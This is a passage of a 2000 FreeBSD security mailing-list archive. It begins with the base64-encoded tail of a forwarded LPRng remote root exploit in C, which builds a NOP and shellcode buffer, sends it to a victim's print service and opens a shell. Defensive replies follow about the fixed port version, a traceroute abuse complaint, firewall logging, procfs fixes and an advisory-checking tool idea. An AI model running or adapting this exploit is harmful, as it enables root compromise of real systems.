LHRlbXApOw0KDQogICAgcHJpbnRmKCJhZGRpbmcgbm9wcy4uXG4iKTsNCiAg ICBiID0gc3RybGVuKHlhaG9vKTsNCiAgICBmb3IgKGk9MCA7IGkgPCAoNTEy LWItc3RybGVuKHNoZWxsY29kZSkpIDsgaSsrKQ0KICAgICAgICB5YWhvb1ti K2ldID0gJ1x4OTAnOw0KDQogICAgcHJpbnRmKCJhZGRpbmcgc2hlbGxjb2Rl Li5cbiIpOw0KICAgIGI9K2k7DQogICAgZm9yICh4PTAgOyB4IDwgYiA7IHgr KykNCiAgICAgICAgeWFob29bYit4XSA9IHNoZWxsY29kZVt4XTsNCg0KICAg IHN0cmNhdCh5YWhvbywiXG4iKTsNCg0KICAgIHByaW50ZigiYWxsIGlzIHBy ZXBhcmVkLi4gbm93IGxldHMgY29ubmVjdCB0byBzb21ldGhpbmcuLlxuIik7 DQoNCn0NCg0KY2hlY2tfbmVnYXRpdmUodW5zaWduZWQgbG9uZyBhZGRyKQ0K ew0KICAgIGNoYXIgaGVbMTI4XTsNCg0KICAgIHNwcmludGYoaGUsIiVkIixh ZGRyKTsNCiAgICBpZiAoYXRvaShoZSkgPCAwKQ0KICAgICAgICBhZGRyID0g YWRkciArIDI1NjsNCiAgICByZXR1cm4gYWRkcjsNCn0NCg0Kdm9pZCBta19j b25uZWN0KGNoYXIgdmljdGltWzEyOF0sIGludCBwb3J0KQ0Kew0KICAgIHN0 cnVjdCBob3N0ZW50ICpob3N0Ow0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiBk ZW4wbjsNCiAgICBpbnQgc294Ow0KDQogICAgZGVuMG4uc2luX2ZhbWlseSA9 IEFGX0lORVQ7DQogICAgZGVuMG4uc2luX3BvcnQgPSBodG9ucyhwb3J0KTsN Cg0KICAgIGhvc3QgPSBnZXRob3N0YnluYW1lKHZpY3RpbSk7DQogICAgaWYg KCFob3N0KQ0KICAgIHsNCiAgICAgICAgcHJpbnRmKCJjYW5ub3QgcmVzb2x2 ZSwgZXhpdGluZy4uLlxuIik7DQogICAgICAgIGV4aXQoMCk7DQogICAgfQ0K DQogICAgYmNvcHkoaG9zdC0+aF9hZGRyLCAoc3RydWN0IGluX2FkZHIgKikm ZGVuMG4uc2luX2FkZHIsIGhvc3QtPmhfbGVuZ3RoKTsNCg0KICAgIHNveCA9 IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgMCk7DQoNCiAgICBzaWdu YWwoU0lHQUxSTSwgc2lnYWxhcm0pOw0KICAgIGFsYXJtKDEwKTsNCg0KICAg IHByaW50ZigiY29ubmVjdGluZyB0byAlcyB0byBwb3J0ICVkXG4iLGhvc3Qt PmhfbmFtZSwgcG9ydCk7DQogICAgaWYgKGNvbm5lY3Qoc294LCAoc3RydWN0 IHNvY2thZGRyICopJmRlbjBuLCBzaXplb2Yoc3RydWN0IHNvY2thZGRyKSkg PCAwKQ0KICAgIHsNCiAgICAgICAgcHV0Y2hhcignXG4nKTsNCiAgICAgICAg cGVycm9yKCJjb25uZWN0Iik7DQogICAgICAgIGV4aXQoMSk7DQogICAgfQ0K ICAgIHByaW50ZigiY29ubmVjdGVkISwgc2VuZGluZyB0aGUgYnVmZmVyLi4u XG5cbiIpOw0KICAgIHdyaXRlKHNveCwgeWFob28gLCBzdHJsZW4oeWFob28p KTsNCiAgICBwcmludGYoIiVzXG4iLCB5YWhvbyk7DQogICAgc2xlZXAoMSk7 DQogICAgYWxhcm0oMCk7DQogICAgcnVuc2hlbGwoc294KTsNCn0NCg0KaW50 IHJ1bnNoZWxsKGludCBzb3gpDQp7DQogICAgZmRfc2V0ICByc2V0Ow0KICAg IGludCAgICAgbjsNCiAgICBjaGFyICAgIGJ1ZmZlcls0MDk2XTsNCg0KICAg IGNoYXIgKmNvbW1hbmQ9Ii9iaW4vdW5hbWUgLWEgOyAvdXNyL2Jpbi9pZFxu IjsNCg0KDQogICAgc2VuZChzb3gsIGNvbW1hbmQsIHN0cmxlbihjb21tYW5k KSwgMCk7DQoNCiAgICBmb3IgKDs7KSB7DQogICAgICAgIEZEX1pFUk8gKCZy c2V0KTsNCiAgICAgICAgRkRfU0VUIChzb3gsICZyc2V0KTsNCiAgICAgICAg RkRfU0VUIChTVERJTl9GSUxFTk8sICZyc2V0KTsNCg0KICAgICAgICBuID0g c2VsZWN0KHNveCArIDEsICZyc2V0LCBOVUxMLCBOVUxMLCBOVUxMKTsNCiAg ICAgICAgaWYobiA8PSAwKQ0KICAgICAgICAgICAgcmV0dXJuICgtMSk7DQoN CiAgICAgICAgaWYoRkRfSVNTRVQgKHNveCwgJnJzZXQpKSB7DQogICAgICAg ICAgICBuID0gcmVjdiAoc294LCBidWZmZXIsIHNpemVvZiAoYnVmZmVyKSwg MCk7DQogICAgICAgICAgICBpZiAobiA8PSAwKQ0KICAgICAgICAgICAgICAg IGJyZWFrOw0KDQogICAgICAgICAgICB3cml0ZSAoU1RET1VUX0ZJTEVOTywg YnVmZmVyLCBuKTsNCiAgICAgICAgfQ0KDQogICAgICAgIGlmKEZEX0lTU0VU IChTVERJTl9GSUxFTk8sICZyc2V0KSkgew0KICAgICAgICAgICAgbiA9IHJl YWQgKFNURElOX0ZJTEVOTywgYnVmZmVyLCBzaXplb2YgKGJ1ZmZlcikpOw0K ICAgICAgICAgICAgaWYgKG4gPD0gMCkNCiAgICAgICAgICAgICAgICBicmVh azsNCg0KICAgICAgICAgICAgc2VuZChzb3gsIGJ1ZmZlciwgbiwgMCk7DQog ICAgICAgIH0NCiAgICB9DQogICAgcmV0dXJuICgwKTsNCn0NCg0Kdm9pZCBz aWdhbGFybSgpDQp7DQogICAgcHJpbnRmKCJjb25uZWN0aW9uIHRpbWVkIG91 dCwgZXhpdGluZy4uLlxuIik7DQogICAgZXhpdCgwKTsNCn0NCg0Kdm9pZCBz aWdpbnQoKQ0Kew0KICAgIHByaW50ZigiQ0FVR0hUIHNpZ2ludCwgZXhpdGlu Zy4uLlxuIik7DQogICAgZXhpdCgwKTsNCn0NCg0KDQp2b2lkIHVzYWdlKGNo YXIgKnByb2cpDQp7DQogICAgaW50IGk7DQoNCiAgICBwcmludGYoIlxuKiog TFBSbmcgcmVtb3RlIHJvb3QgZXhwbG9pdCBjb2RlZCBieSB2ZW5vbW91cyBv ZiByZEMgKipcbiIpOw0KICAgIHByaW50ZigiVXNhZ2U6XG5cbiIpOw0KICAg IHByaW50ZigiJXMgWy1oIGhvc3RuYW1lXSA8LXAgcG9ydD4gPC1yIGFkZHI+ IDwtcyBzaGVsbGNvZGVhZGRyPiA8LXQgdHlwZT4gPC1QIHBhZGRpbmc+IDwt UiBvZmZzZXQ+IDwtUyBvZmZzZXQ+IDwtYyBvZmZzZXQ+XG5cbiIsIHByb2cp Ow0KICAgIHByaW50ZigiLWggaXMgdGhlIHZpY3RpbSBpcC9ob3N0XG4iKTsN CiAgICBwcmludGYoIi1wIHNlbGVjdCBhIGRpZmZlcmVudCBwb3J0IHRvIGNv bm5lY3QsIGRlZmF1bHQgNTE1XG4iKTsNCiAgICBwcmludGYoIi1yIGlzIHRo ZSBhZGRyZXNzIHRvIG92ZXJ3cml0ZVxuIik7DQogICAgcHJpbnRmKCItcyBp cyB0aGUgYWRkcmVzcyBvZiB0aGUgc2hlbGxjb2RlXG4iKTsNCiAgICBwcmlu dGYoIllvdSBjYW4gdXNlIGEgcHJlZGVmaW5lZCBhZGRyL3NoZWxsY29kZWFk ZHIgdXNpbmcgLXQgPG51bWJlcj5cblxuIik7DQogICAgcHJpbnRmKCJhdmFp bGFibGVzIHR5cGVzOlxuXG4iKTsNCiAgICBmb3IgKGk9MCA7IHRhcmdldFtp XS5kZXNjICE9IE5VTEwgOyBpKyspDQogICAgICAgIHByaW50ZigiJWQgLSAl c1xuIixpLHRhcmdldFtpXS5kZXNjKTsNCiAgICBwcmludGYoIlxuLVAgaXMg dG8gZGVmaW5lIHRoZSBwYWRkaW5nIHRvIHVzZSwgdXN1YWxseSAyXG4iKTsN CiAgICBwcmludGYoIi1SIHRoZSBvZmZzZXQgdG8gYWRkIHRvIDxhZGRyPlxu Iik7DQogICAgcHJpbnRmKCItUyB0aGUgb2Zmc2V0IHRvIGFkZCB0byA8c2hl bGxjb2RlYWRkcj5cbiIpOw0KICAgIHByaW50ZigiLWMgd2hlcmUgd2Ugc3Rh cnQgdG8gY29udHJvbCB0aGUgZm9ybWF0IHN0cmluZ1xuXG4iKTsNCiAgICBl eGl0KDApOw0KfQ0K - --8323328-1307901943-976761685=:2576-- ------- End of Forwarded Message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Dec 14 17:40: 3 2000 From owner-freebsd-security@FreeBSD.ORG Thu Dec 14 17:39:58 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from faith.cs.utah.edu (faith.cs.utah.edu [155.99.198.108]) by hub.freebsd.org (Postfix) with ESMTP id 7022E37B400 for ; Thu, 14 Dec 2000 17:39:57 -0800 (PST) Received: (from danderse@localhost) by faith.cs.utah.edu (8.9.3/8.9.3) id SAA00368; Thu, 14 Dec 2000 18:39:54 -0700 (MST) Message-Id: <200012150139.SAA00368@faith.cs.utah.edu> Subject: Re: mindspring complains about intrusive port scans To: meshko@cs.brandeis.edu (Mikhail Kruk) Date: Thu, 14 Dec 2000 18:39:54 -0700 (MST) Cc: freebsd-security@FreeBSD.ORG In-Reply-To: from "Mikhail Kruk" at Dec 14, 2000 08:29:31 PM From: "David G. Andersen" X-Mailer: ELM [version 2.5 PL2] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: danderse@cs.utah.edu Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Tell them to contact the person who sent the complaint in and educate them. They should NOT complain that someone tracerouted to or pinged them. Period. This is _normal_ behavior on the Internet. If they don't want to deal with traceroutes or pings, they should block it at their border and be done with it. The increasing port numbers in the high range suggest that it's a traceroute. The person whose IDS reported this system, and then they acted on it blindly, should be bopped on the head. -Dave Lo and behold, Mikhail Kruk once said: > > Hi > I got the following message from my DSL provider. > I think that the logs they show are caused by me running ping and > traceroute on some host on their network. (note that I've substituted my > ip by xxx.xxx.xxx.xxx in the logs just in case) > > So my questions are: > a) is there any chance that I'm wrong and this log is not caused by > ping/traceroute? > b) can they accuse me of violating anything because I run traceroute? > Sounds like bs to me... > > included message: > > >From abuse@mindspring.net Thu Dec 14 20:23:57 2000 > Date: Thu, 14 Dec 2000 17:27:13 -0500 (EST) > From: abuse@mindspring.net > To: bkruk@ix.netcom.com > Subject: Issue 001214-18234395 > > Hello, > > We have recently received a complaint of intrusive port scans. Upon > investigating, we have determined that this alleged abuse is originating > from your account. In a case like this, we like to let you know about the > report, so that you may take a moment to review our policies regarding > network unfriendly activity and netiquette. It is our hope that by > notifying you of the report, we are helping to avoid any further incidents > of this nature. > > Please view our appropriate use policy, it is available at: > > http://www.mindspring.net/aboutms/policy.html > > Pay particular attention to the following section: > > "Privacy violations: > Attempts, whether successful or unsuccessful, to gain access to any > electronic systems, networks or data, without proper consent, are > prohibited." > > These types of cases are often escalated by some sort of misunderstanding, > by keeping us informed, you will be helping us avoid that. > > Regards, > > Erich Hablutzel > > EarthLink/MindSpring AUP Abuse Investigator > > ----------------------------------------------------------------------------- > > portion of logs detailing incident: > > > FWIN,2000/12/11,18:39:54 +10:00 > GMT,xxx.xxx.xxx.xxx:0,203.164.30.182:0,ICMP > > FWIN,2000/12/11,18:40:16 +10:00 > GMT,xxx.xxx.xxx.xxx:41374,203.164.30.182:33489,UDP > > FWIN,2000/12/11,18:40:20 +10:00 > GMT,xxx.xxx.xxx.xxx:41374,203.164.30.182:33490,UDP > > WIN,2000/12/11,18:40:26 +10:00 > GMT,xxx.xxx.xxx.xxx:41374,203.164.30.182:33491,UDP > ----------------------------------------------------------------------------- > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -- work: dga@lcs.mit.edu me: dga@pobox.com MIT Laboratory for Computer Science http://www.angio.net/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Dec 14 17:57:52 2000 From owner-freebsd-security@FreeBSD.ORG Thu Dec 14 17:57:50 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from peitho.fxp.org (peitho.fxp.org [209.26.95.40]) by hub.freebsd.org (Postfix) with ESMTP id 7108737B402 for ; Thu, 14 Dec 2000 17:57:50 -0800 (PST) Received: by peitho.fxp.org (Postfix, from userid 1501) id D53F91360E; Thu, 14 Dec 2000 20:57:49 -0500 (EST) Date: Thu, 14 Dec 2000 20:57:49 -0500 From: Chris Faulhaber To: Cy Schubert - ITSD Open Systems Group Cc: desmo@bandwidth.org, freebsd-security@freebsd.org Subject: Re: LPRng remote root exploit (fwd) Message-ID: <20001214205749.A48180@peitho.fxp.org> Mail-Followup-To: Chris Faulhaber , Cy Schubert - ITSD Open Systems Group , desmo@bandwidth.org, freebsd-security@freebsd.org References: <200012150131.eBF1VPa05764@cwsys.cwsent.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200012150131.eBF1VPa05764@cwsys.cwsent.com>; from Cy.Schubert@uumail.gov.bc.ca on Thu, Dec 14, 2000 at 05:30:52PM -0800 Sender: cdf.lists@fxp.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Dec 14, 2000 at 05:30:52PM -0800, Cy Schubert - ITSD Open Systems Group wrote: > This is just a heads up. > > Anyone care to test this with our LPRng port? > *snip* > > LPRng-3.6.22/23/24 remote root exploit, enjoy. > *snip* It won't hurt to try, however, ports/sysutils/LPRng is at 3.6.26, which is supposed to fix this problem. -- Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org -------------------------------------------------------- FreeBSD: The Power To Serve - http://www.FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Dec 14 20:44: 4 2000 From owner-freebsd-security@FreeBSD.ORG Thu Dec 14 20:44:01 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from caligula.anu.edu.au (caligula.anu.edu.au [150.203.224.42]) by hub.freebsd.org (Postfix) with ESMTP id EBA0C37B400 for ; Thu, 14 Dec 2000 20:43:59 -0800 (PST) Received: (from avalon@localhost) by caligula.anu.edu.au (8.9.3/8.9.3) id PAA19298; Fri, 15 Dec 2000 15:43:48 +1100 (EST) From: Darren Reed Message-Id: <200012150443.PAA19298@caligula.anu.edu.au> Subject: Re: Extended ipfw Logging To: Gerhard.Sittig@gmx.net (Gerhard Sittig) Date: Fri, 15 Dec 2000 15:43:48 +1100 (Australia/ACT) Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <20001214205854.J253@speedy.gsinet> from "Gerhard Sittig" at Dec 14, 2000 08:58:54 PM X-Mailer: ELM [version 2.5 PL1] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: avalon@caligula.anu.edu.au Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In some mail from Gerhard Sittig, sie said: [...] > > WHAT THE PATCHES DO > > > > There are new fields for all packets. Data from the IP header, > > the IP ID, TTL, and extra fragmentation information is printed > > for all types of datagrams. TCP packets include additional > > information on sequence number, acknowledgement number, and > > flags. > > Why not have the "verbosity" written in the matching rule? One > surely doesn't want to bloat *all* logged entries (not even log > all denials, and maybe log some accepted packets too). Expand > the filter description for the log verbosity level and reference > this field when the match is meant to log something. > > I'm not saying that ipf(4) is the cure for everything. But > looking at "man 5 ipf" here's what I really like about it and you > might, too: > > log = "log" [ "body" ] [ "first" ] [ "or-block" ] [ "level" loglevel ] . > > Although the above "loglevel" is different from your verbosity > idea (it's a syslog facility.level pair) you might want to have > the best of both worlds in ipfw(4) and code syslog levels as well > as your verbosity controlling what packet characteristics to > print out and where to do so? :) Well, I should point out that the output you see for ipfilter logs is generated (usually) by ipmon. If you changed that and that alone, you could have it display every field in the TCP/IP headers. Rather than generating log information with "ipmon -Ds" or "ipmon -D /var/log/ipflog" is to do "cat /dev/ipl > /var/log/ipflog" and then generate text from the binary with "ipmon -stf /var/log/ipflog". Hmmm....I should add a standard option to ipmon which saves the binary log data to one file and does something else with the text. That way you get the "summary" of the important data as text via syslog or some other means as well as the complete details in the binary file. Getting back to what you are discussing here, the problem I have with variable verbosity is the text then becomes irregular for the purpose of parsing and analysis. Darren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Dec 14 22:28:10 2000 From owner-freebsd-security@FreeBSD.ORG Thu Dec 14 22:28:08 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from citusc.usc.edu (citusc.usc.edu [128.125.38.123]) by hub.freebsd.org (Postfix) with ESMTP id 4831637B400 for ; Thu, 14 Dec 2000 22:28:08 -0800 (PST) Received: (from kris@localhost) by citusc.usc.edu (8.9.3/8.9.3) id WAA02135; Thu, 14 Dec 2000 22:27:42 -0800 Date: Thu, 14 Dec 2000 22:27:42 -0800 From: Kris Kennaway To: Cy Schubert - ITSD Open Systems Group Cc: John Howie , security@FreeBSD.ORG Subject: Re: procfs vulnerability (Re: Details of www.freebsd.org penetration) Message-ID: <20001214222742.C2040@citusc.usc.edu> References: <20001214082814.A25963@citusc.usc.edu> <200012142108.eBEL8wo04627@cwsys.cwsent.com> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="oJ71EGRlYNjSvfq7" Content-Disposition: inline User-Agent: Mutt/1.2i In-Reply-To: <200012142108.eBEL8wo04627@cwsys.cwsent.com>; from Cy.Schubert@uumail.gov.bc.ca on Thu, Dec 14, 2000 at 01:08:47PM -0800 Sender: kris@citusc.usc.edu Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --oJ71EGRlYNjSvfq7 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline On Thu, Dec 14, 2000 at 01:08:47PM -0800, Cy Schubert - ITSD Open Systems Group wrote: > Has the fix been committed? If so, is it procfs_ctl.c 1.22? Several fixes have been committed to -stable, the remaining problem was fixed in -current probably in that CVS revision, but when I last checked my commit mail it hadn't been fixed in 4.x (Robert has a different patch which will be committed shortly, because of 5.0/4.x differences) Kris --oJ71EGRlYNjSvfq7 Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE6ObnbWry0BWjoQKURAt96AJ9T1RBveOWK4VtC1dlmpdP1csI2JACdFWJF dz7t0V6Q+P6dySQnCLhZF50= =LsMU -----END PGP SIGNATURE----- --oJ71EGRlYNjSvfq7-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Dec 14 22:31:49 2000 From owner-freebsd-security@FreeBSD.ORG Thu Dec 14 22:31:47 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from citusc.usc.edu (citusc.usc.edu [128.125.38.123]) by hub.freebsd.org (Postfix) with ESMTP id 7EF7E37B400 for ; Thu, 14 Dec 2000 22:31:47 -0800 (PST) Received: (from kris@localhost) by citusc.usc.edu (8.9.3/8.9.3) id WAA02173; Thu, 14 Dec 2000 22:31:11 -0800 Date: Thu, 14 Dec 2000 22:31:11 -0800 From: Kris Kennaway To: Chris Faulhaber Cc: Cy Schubert - ITSD Open Systems Group , desmo@bandwidth.org, freebsd-security@FreeBSD.ORG Subject: Re: LPRng remote root exploit (fwd) Message-ID: <20001214223111.D2040@citusc.usc.edu> References: <200012150131.eBF1VPa05764@cwsys.cwsent.com> <20001214205749.A48180@peitho.fxp.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="IMjqdzrDRly81ofr" Content-Disposition: inline User-Agent: Mutt/1.2i In-Reply-To: <20001214205749.A48180@peitho.fxp.org>; from jedgar@fxp.org on Thu, Dec 14, 2000 at 08:57:49PM -0500 Sender: kris@citusc.usc.edu Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --IMjqdzrDRly81ofr Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Thu, Dec 14, 2000 at 08:57:49PM -0500, Chris Faulhaber wrote: > On Thu, Dec 14, 2000 at 05:30:52PM -0800, Cy Schubert - ITSD Open Systems= Group wrote: > > This is just a heads up. > >=20 > > Anyone care to test this with our LPRng port? > >=20 > *snip* > >=20 > > LPRng-3.6.22/23/24 remote root exploit, enjoy. > >=20 > *snip* >=20 >=20 > It won't hurt to try, however, ports/sysutils/LPRng is > at 3.6.26, which is supposed to fix this problem. Yes, I believe so. See the advisory of a month or so ago. Kris --IMjqdzrDRly81ofr Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE6ObqtWry0BWjoQKURAuF/AJ9cy9cp4Gb3dT8W4LwzBXO9Bm5LhgCg3gp8 4hyw7YzhZFETzdkVg8nA1OQ= =NHDD -----END PGP SIGNATURE----- --IMjqdzrDRly81ofr-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Dec 14 22:32: 3 2000 From owner-freebsd-security@FreeBSD.ORG Thu Dec 14 22:32:00 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from citusc.usc.edu (citusc.usc.edu [128.125.38.123]) by hub.freebsd.org (Postfix) with ESMTP id 62B7637B402 for ; Thu, 14 Dec 2000 22:32:00 -0800 (PST) Received: (from kris@localhost) by citusc.usc.edu (8.9.3/8.9.3) id WAA02269; Thu, 14 Dec 2000 22:33:17 -0800 Date: Thu, 14 Dec 2000 22:33:17 -0800 From: Kris Kennaway To: jrz Cc: security@FreeBSD.ORG Subject: Re: procfs vulnerability (Re: Details of www.freebsd.org penetration) Message-ID: <20001214223317.E2040@citusc.usc.edu> References: <20001214200810.2EA6337B400@hub.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2i In-Reply-To: <20001214200810.2EA6337B400@hub.freebsd.org>; from jrz@cnmnetwork.com on Thu, Dec 14, 2000 at 12:21:06PM -0800 Sender: kris@citusc.usc.edu Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Dec 14, 2000 at 12:21:06PM -0800, jrz wrote: > >unmount procfs now on > >your multi-user systems. > > > >Kris > > Kris, > > What versions of FreeBSD is this affecting at this time? It's complicated..wait for the advisory. Kris To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Dec 15 12:16:14 2000 From owner-freebsd-security@FreeBSD.ORG Fri Dec 15 12:16:08 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mail.gmx.net (pop.gmx.net [194.221.183.20]) by hub.freebsd.org (Postfix) with SMTP id 9D79437B404 for ; Fri, 15 Dec 2000 12:16:07 -0800 (PST) Received: (qmail 12769 invoked by uid 0); 15 Dec 2000 20:16:06 -0000 Received: from p3ee21663.dip.t-dialin.net (HELO speedy.gsinet) (62.226.22.99) by mail.gmx.net (mail07) with SMTP; 15 Dec 2000 20:16:06 -0000 Received: (from sittig@localhost) by speedy.gsinet (8.8.8/8.8.8) id SAA12031 for freebsd-security@FreeBSD.ORG; Fri, 15 Dec 2000 18:41:51 +0100 Date: Fri, 15 Dec 2000 18:41:51 +0100 From: Gerhard Sittig To: freebsd-security@FreeBSD.ORG Subject: Re: Extended ipfw Logging Message-ID: <20001215184150.K253@speedy.gsinet> Mail-Followup-To: freebsd-security@FreeBSD.ORG References: <20001214205854.J253@speedy.gsinet> <200012150443.PAA19298@caligula.anu.edu.au> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <200012150443.PAA19298@caligula.anu.edu.au>; from avalon@coombs.anu.edu.au on Fri, Dec 15, 2000 at 03:43:48PM +1100 Organization: System Defenestrators Inc. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, Dec 15, 2000 at 15:43 +1100, Darren Reed wrote: > In some mail from Gerhard Sittig, sie said: > > > > Why not have the "verbosity" written in the matching rule? > > One surely doesn't want to bloat *all* logged entries (not > > even log all denials, and maybe log some accepted packets > > too). > > Getting back to what you are discussing here, the problem I > have with variable verbosity is the text then becomes irregular > for the purpose of parsing and analysis. The most probable (from my POV) application for different verbosity depending on the matching rule would be to, say, log some UDP packets with "log body" while just doing "log" or "log first" for the fact that some TCP packet was dropped -- since the first TCP packet (SYN) doesn't contain level 5+ payload and reading the body in hex is not any more informative than reading its textual representation of the header immediately above. Speaking of "irregular log text layout" we already have this. :) The "Nx" for repeated matches between the timestamp and the interface name does already shift the rest of the line. Maybe those log lines without the count number should have a place holder, too? But then one could start printing IPs with "maximum width" etc to have everything aligned for the (human) reader. I see, thinking about this is getting endless ... And maybe I'm just missing how the verbosity level differs from the "simple" (since two stage only) header / header + body logging. Maybe having ipfw log a line like it does now and maybe printing a "continuation line" with additional data when asked to do so in the matching rule would be a way to go. virtually yours 82D1 9B9C 01DC 4FB4 D7B4 61BE 3F49 4F77 72DE DA76 Gerhard Sittig true | mail -s "get gpg key" Gerhard.Sittig@gmx.net -- If you don't understand or are scared by any of the above ask your parents or an adult to help you. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Dec 15 16:16:32 2000 From owner-freebsd-security@FreeBSD.ORG Fri Dec 15 16:16:30 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from hotmail.com (f184.law7.hotmail.com [216.33.237.184]) by hub.freebsd.org (Postfix) with ESMTP id 98FE037B400 for ; Fri, 15 Dec 2000 16:16:30 -0800 (PST) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Fri, 15 Dec 2000 16:16:30 -0800 Received: from 209.53.54.44 by lw7fd.law7.hotmail.msn.com with HTTP; Sat, 16 Dec 2000 00:16:29 GMT X-Originating-IP: [209.53.54.44] From: "Some Person" To: freebsd-security@freebsd.org Subject: Security Update Tool.. Date: Sat, 16 Dec 2000 00:16:29 Mime-Version: 1.0 Content-Type: text/plain; format=flowed Message-ID: X-OriginalArrivalTime: 16 Dec 2000 00:16:30.0133 (UTC) FILETIME=[702C0E50:01C066F5] Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hey ppl. Sorry I just joined the list so I dunno what kinda posts usally go on here but I was just browsing www.freebsd.org/security and... Well, seeing there's new security discoveries, patches and a whole schlew of CERT advisories etc.. it's hard to keep up with what needs securing, and what to secure, from the base system, from the ports, etc. My question is, is there a util yet that in theory (maybe if so, or if someone writes one would work differently than what I'm imagining) queries a central database with all the security advisories, checks the local system for comparisons and vulnerabilities against that database and reports to the user who ran the util. ie, sacheck -H sa-host.freebsd.org I completely made that up, but jsut an idea. ie, sacheck (security advisor check) checks against -H sa-host.freebsd.org. Please, if I sound like a complete idiot, no need to flame.. ;) I'm trying to explain what I think would be a good idea in the best way I can via email and I'm still an intermediate (non-expert) FreeBSD user. I don't know programming (yet) so I probly don't have all the terms, but I do have ideas. ps: Hope I did make atleast some sense in describing my idea. Thanks! _________________________________________________________________________ Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Dec 15 16:21:59 2000 From owner-freebsd-security@FreeBSD.ORG Fri Dec 15 16:21:56 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from sol.cc.u-szeged.hu (sol.cc.u-szeged.hu [160.114.8.24]) by hub.freebsd.org (Postfix) with ESMTP id 1C63D37B400 for ; Fri, 15 Dec 2000 16:21:55 -0800 (PST) Received: from petra.hos.u-szeged.hu by sol.cc.u-szeged.hu (8.9.3+Sun/SMI-SVR4) id BAA24469; Sat, 16 Dec 2000 01:21:34 +0100 (MET) Received: from sziszi by petra.hos.u-szeged.hu with local (Exim 3.12 #1 (Debian)) id 14756U-0001GY-00 for ; Sat, 16 Dec 2000 01:21:34 +0100 Date: Sat, 16 Dec 2000 01:21:34 +0100 From: Szilveszter Adam To: freebsd-security@freebsd.org Subject: Re: Security Update Tool.. Message-ID: <20001216012134.B2400@petra.hos.u-szeged.hu> Mail-Followup-To: Szilveszter Adam , freebsd-security@freebsd.org References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from ntvsunix@hotmail.com on Sat, Dec 16, 2000 at 12:16:29AM +0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, Dec 16, 2000 at 12:16:29AM +0000, Some Person wrote: > Hey ppl. Sorry I just joined the list so I dunno what kinda posts usally go > on here but I was just browsing www.freebsd.org/security and... > > Well, seeing there's new security discoveries, patches and a whole schlew of > CERT advisories etc.. it's hard to keep up with what needs securing, and > what to secure, from the base system, from the ports, etc. > > My question is, is there a util yet that in theory (maybe if so, or if > someone writes one would work differently than what I'm imagining) 